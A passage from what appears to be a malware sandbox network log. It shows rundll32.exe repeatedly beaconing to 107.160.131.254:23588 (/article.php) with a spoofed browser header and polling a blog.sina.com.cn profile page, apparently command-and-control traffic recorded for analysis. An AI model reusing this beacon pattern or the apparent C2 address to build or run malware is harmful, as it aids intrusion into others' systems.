                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          74192.168.2.552999107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:19.565332890 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          75192.168.2.553337116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:20.644289017 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:22.454828978 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:22 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          76192.168.2.555397116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:23.551124096 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:25.922816992 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:25 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          77192.168.2.555398107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:23.553046942 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          78192.168.2.555399107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:23.554677963 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          79192.168.2.558021107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:27.710355997 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          80192.168.2.558024107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:28.026566982 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          81192.168.2.558026116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:28.037859917 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:29.752093077 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:29 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          82192.168.2.559600107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:31.848117113 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          83192.168.2.559713116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:31.922398090 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          84192.168.2.559752107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:31.957998037 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          85192.168.2.562269116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:35.986850977 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:37.694819927 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:37 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          86192.168.2.562270107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:35.990951061 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          87192.168.2.562271107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:35.991053104 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          88192.168.2.564965116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:39.807642937 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          89192.168.2.565081107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:40.000137091 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          90192.168.2.565116107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:40.126209974 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          91192.168.2.565117116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:40.127289057 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:41.868916035 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:41 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          92192.168.2.551043107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:44.125111103 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          93192.168.2.551144107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:44.251338005 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          94192.168.2.551145116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:44.251538038 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:45.970633984 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:45 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          95192.168.2.553634107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:48.248791933 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          96192.168.2.553691116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:48.365900993 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:50.736736059 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:50 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          97192.168.2.553692107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:48.365900993 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          98192.168.2.555778107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:52.264977932 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          99192.168.2.555835116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:52.408742905 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          100192.168.2.555836107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:52.409044981 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          101192.168.2.557965107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:56.285142899 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          102192.168.2.558043116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:56.396898985 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:35:58.175431013 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:35:57 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx/1.2.8</center></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          103192.168.2.558045107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:35:56.403100014 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          104192.168.2.560319107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:00.296431065 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          105192.168.2.560345107.160.131.254235885400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:00.428411007 CET187OUTGET /article.php HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
                                                                                                                                          Host: 107.160.131.254:23588
                                                                                                                                          Cache-Control: no-cache


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          106192.168.2.561064116.133.8.92805400C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Dec 19, 2024 15:36:01.765031099 CET118OUTGET /u/5762479093 HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
                                                                                                                                          Host: blog.sina.com.cn
                                                                                                                                          Dec 19, 2024 15:36:03.559776068 CET371INHTTP/1.1 302 Moved Temporarily
                                                                                                                                          Server: nginx/1.2.8
                                                                                                                                          Date: Thu, 19 Dec 2024 14:36:03 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Location: https://blog.sina.com.cn/u/5762479093
